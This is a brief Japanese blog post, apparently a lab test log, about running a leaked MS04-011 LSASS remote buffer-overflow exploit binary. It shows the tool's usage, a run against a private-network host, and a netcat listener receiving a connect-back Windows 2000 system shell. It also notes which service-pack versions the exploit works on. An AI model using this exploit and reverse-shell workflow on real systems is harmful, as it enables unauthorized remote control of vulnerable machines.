LSASS exploit
Binaryが某所に投稿されてますな。結局コンパイルできずにいたのでその放置気味だったけど...k-otikベースのものらしい。日本語もSP4だと下のようにスカッと決まるが、SP3だと再起動しちゃいますね。ちなみにこのファイルと同じ階層には今までの攻撃ツールが転がっていますねぇ。
攻
C:\temp\RLsasrv>RLsasrv.exe Windows Lsasrv.dll RPC [ms04011] buffer overflow Remote Exploit Bug discovered by eEye Code by sbaa (sysop sbaa 3322 org) 2004/04/24 ver 0.1 Usage: RLsasrv 0 targetip [Port ConnectBackIP] ----> attack 2k RLsasrv 1 targetip [Port ConnectBackIP] ----> attack xp C:\temp\RLsasrv>RLsasrv 0 192.168.20.20 31000 192.168.20.10 shellcode size 316
受
C:\>nc -l -p 31000 ] Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>
追記: